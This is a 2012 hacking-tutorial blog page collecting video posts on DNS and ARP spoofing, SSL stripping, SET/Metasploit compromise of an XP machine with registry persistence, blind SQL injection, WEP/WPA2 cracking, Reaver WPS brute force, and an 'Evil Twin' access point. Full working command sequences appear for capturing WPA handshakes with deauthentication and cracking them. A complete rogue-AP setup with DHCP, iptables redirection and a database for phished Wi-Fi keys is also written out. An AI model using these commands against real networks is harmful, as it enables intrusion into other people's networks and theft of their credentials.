Tuesday, 2024-03-19, 7:39 AM
Welcome Guest | RSS
Statistics

Total online: 1
Guests: 1
Users: 0
Site menu
Our Documentations
1* METASPLOIT
Blog Category
# Only for beginners [39]
This category contains some introductions and tutorials about UBUNTU and BACKTRACK for those who just start using LINUX.
# Computer Security [11]
In this category, you will find all courses about the Informatique Security
# LINUX [2]
EVERYTHING ABOUT LINUX - UBUNTU & BACKTRACK - (NEWS, VIDEOS, TUTORIALS, ... )
# BackTrack 5 Tutorials [6]
In this categorie, I will post all tutorials about BackTrack5 (Installation, Configuration, Update, Hacking...)
# TechnicDynamic Tutorials [12]
Technic Dynamic is a source of education focused in the following categories of technology: (Computer - Design - Gadgets - Networking - Security) Link : http://technicdynamic.com
# Vishnuvalentino Tutorials [2]
He is a computer security specialist, and also freelance website designer. Read more : http://vishnuvalentino.com/about/
# Hackers News [6]
All news about the hackers of the world ...
# Tools [18]
All Security Tools
MEMES PICTURES [0]
Entries archive
Shopping


Follow us
facebook
Main » 2012 » March » 22

Ettercap: DNS Spoof Configuration

So recently I’ve been trying to run the DNS Spoof plugin from ettercap and kept getting "Dissector DNS not supported” as soon as I ran the program.

After searching I found the original cause of the problem: a bug in the amd 64 bits architecture.

So the solution was simple: to use the 32 bits version for now, until they develop a working version for amd64.

On to the video, this time we are simply going to host a server, spoof the dns to redirect ALL TRAFFIC to our server…

Watch in 1080p!


Category: # TechnicDynamic Tutorials | Views: 1419 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

This time we are owning a fully patched XP box just to show the power of Social Engineering Toolkit combined with a dns spoof technique (ettercap).

Attacker: Backtrack 5 R1 (GNOME-32)
Victim: Windows XP SP3 Fully Patched

Tools: S.E.T., Ettercap & Metasploit

Check out the teaser video and expect more on this soon :)


Category: # TechnicDynamic Tutorials | Views: 1289 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

Following up on the last post, we are gonna take it a little further this time…

Attacker: Backtrack 5 R1 Gnome 32
Victim: Windows XP sp3 Fully Patched

We will spoof the network, this time using arpspoof & dnsspoof just because they provide greater finnesse! :D
For the Social Engineering Toolkit (SET) attack, I am going to use a custom template for Facebook (seen in an earlier post) since it reduces loading time compared to the cloned pages by S.E.T.

For the payload I choose the Meterpreter session in order to upload a file and make the victim’s Windows machine load that file every time the computer starts.
To achieve this we modify the regedit of the XP box via a vnc session.

Enough Talk, let’s check that video in hi-def:

Song: Victor Munhoz & Endo – Funky 2 (JPhil Remix)

... Read more »

Category: # TechnicDynamic Tutorials | Views: 1148 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

I noticed a lot of newcomers have problem adapting to Backtrack Linux right away, since they don’t know basic functionality and commands. So I’ve decided to make this video as a starting point to show some of what is possible on Windows.

On this tutorial we will be using Cain & Abel to sniff SSL passwords. The user has to agree to a fake certificate in this scenario. Luckily most users almost always agree without even looking at it. :)

If you are familiar with Linux I recommend to use it instead since it is much more networking oriented and possesses a lot more tools (all free)

We do an ARP Poison on the network to capture all the traffic between router (default gateway) and host.

Check it out (high quality)!


Category: # TechnicDynamic Tutorials | Views: 1718 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

If you think https if secure, think again.

This time we will be showing a seamless sniffing attack, where the attacker injects the whole network using ARP poisoning to become the man-in-the-middle.

After poisoning the network, all SSL / https traffic is redirected to a normal http (port 10000) without the targets even noticing anything. To top it off we display a lock icon on the webpage to make it seem like a https page.

Check out the video in high quality and leave feedback to TechnicDynamic@gmail.com !

Song: Oblivion, Endo – The Mente

... Read more »

Category: # TechnicDynamic Tutorials | Views: 849 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

This time we will be taking a look at the true & false SQL injection method.

Although most programmers have already noticed this flaw and taken the right countermeasures to prevent it, due to the large amount of websites going up everyday, there are still many vulnerable pages.

This method is simple overall, however some knowledge of programming and SQL will be handy.

Basically, we want to locate a dynamic field on the website and make it return to either true or false. So if we insert a SQL statement asking the database to return a specific amount of tables and it returns false, we know the database has less tables than what we suggested.

That is the main logic behind the method!

The easiest way to identify if the return was true or false is, mostly, simple. Wherever should the dynamic content be on the website, will be missing (either blank, or upon viewing the source code of the page, one should see: "You have an error…”).

Check out the video:



Category: # TechnicDynamic Tutorials | Views: 1230 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Still today, it is very common to see small & medium business’ using low security settings on their network’s.

On this educational video, we will be looking at how an attacker would gain front door access to a network just by monitoring enough data packets to eventually crack the password.

The wireless network is in default configuration using the WEP encryption method.

Let’s take a look at the gear:

  • Wireless Network Interface Card: AWUS036NH
  • Alfa AWUS036NH Network Interface Card

  • Computer using Linux Backtrack 5 Operating System
  • Backtrack Linux 5

You can use any Linux distribution you like, but I recommend Backtrack because it comes with everything you will need pre-installed. For more information on how to install Backtrack to your computer or run a Live CD, visit their website by clicking on their logo image. Most wireless network interface cards are automatically identified by Backtrack as well.

Make sure you watch the video in high quality (1080p) so you can see the commands:

If you’re relatively new to Linux, I would recommend downloading the commands file and go through each step following the video. Remember to replace the devices under ()’s for the proper device. Example in video, (wireless device) = wlan0.


Songs used for the video credited to Mt. Eden

Thank you for watching and stay tuned for the next video! :) ... Read more »

Category: # TechnicDynamic Tutorials | Views: 725 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

It’s fair to say WPA 2 has done a lot for wireless networks.

It’s made them more secure that’s for sure. However the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:

  • 1. Put wireless interface down, spoof the mac address (optional) and put wireless interface in monitor mode.
    • ifconfig wlan0 down
    • macchanger –mac 00:22:44:66:88:00 wlan0
    • airmon-ng start wlan0
  • 2. Start sniffing the target wireless network on the specific channel, write capture to file.
    • airodump-ng -c 1 –bssid Network MAC Addr. -w Capture Filemon0
  • 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
    • aireplay-ng -0 0 -a Network MAC Addr. -h Your MAC Addr. -c Client MAC Addr.mon0
  • 4. Now you are ready to crack using the WPA handshake and your wordlist.
    • aircrack-ng –bssid Network MAC Addr. -w WordlistCapture File

Note: Replace the underlined content on your own execution.

For further details, check out the video in high quality:


Song: Scalameriya – Memento Mori
Category: # TechnicDynamic Tutorials | Views: 1222 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

In an ealier post, we’ve seen how to crack WPA-2 network keys using a dictionary.

While that technique works, it could take an awful long time, especially when brute forcing.

On this technique, named ‘Evil Twin’, we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point – which looks exactly like his. :)

When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.

For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called ‘wpa2′, which can be done with the following commands:

Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor

Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Finally, start apache and mysql services and check everything works, by going typing localhost on a web-browser.

Click here to download the files: [ DOWNLOAD ]

Check out the video:

Song: BGNS – sasas

Commands:

Install dhcp3 and create config file:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf

/etc/dhcp3/dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

Start clone access point:
airmon-ng start wlan0 [channel]
airbase-ng -e "AP name" -c [channel] mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start

Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):
aireplay-ng -0 0 -a [target bssid] [monitor interface]

DeAuthenticate Client (recommended):
aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]

... Read more »

Category: # TechnicDynamic Tutorials | Views: 2139 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

Today we are gonna take a look at the newest tool in hacking wpa/wpa2, Reaver.

This tool bruteforces the Wi-Fi Protected Setup, which uses a PIN containing 8 unknown digits, if you do the math (10^8) that’s around 100,000,000 possibilities. Upon discovering the PIN, Reaver replies back the WPA / WPA 2 key.

Note that not all routers are affected by this, as the person who configured the router might have disabled WPS. It is known however, that the majority of routers come with WPS enabled.

 

Router's WPS Button

WPS Synchronization Button

Protecting yourself against this attack is simple: disable WPS. This is done by accessing your router (usually at 192.168.1.1 at a class C network), after login in, disable WPS.

Now let’s check out the video in HD :D


Category: # TechnicDynamic Tutorials | Views: 1274 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Visitors

Share This On:
Google Translator
Search
Login form
Our poll
Rate my site
Total of answers: 20
Clock & Calendar

«  March 2012  »
SuMoTuWeThFrSa
    123
45678910
11121314151617
18192021222324
25262728293031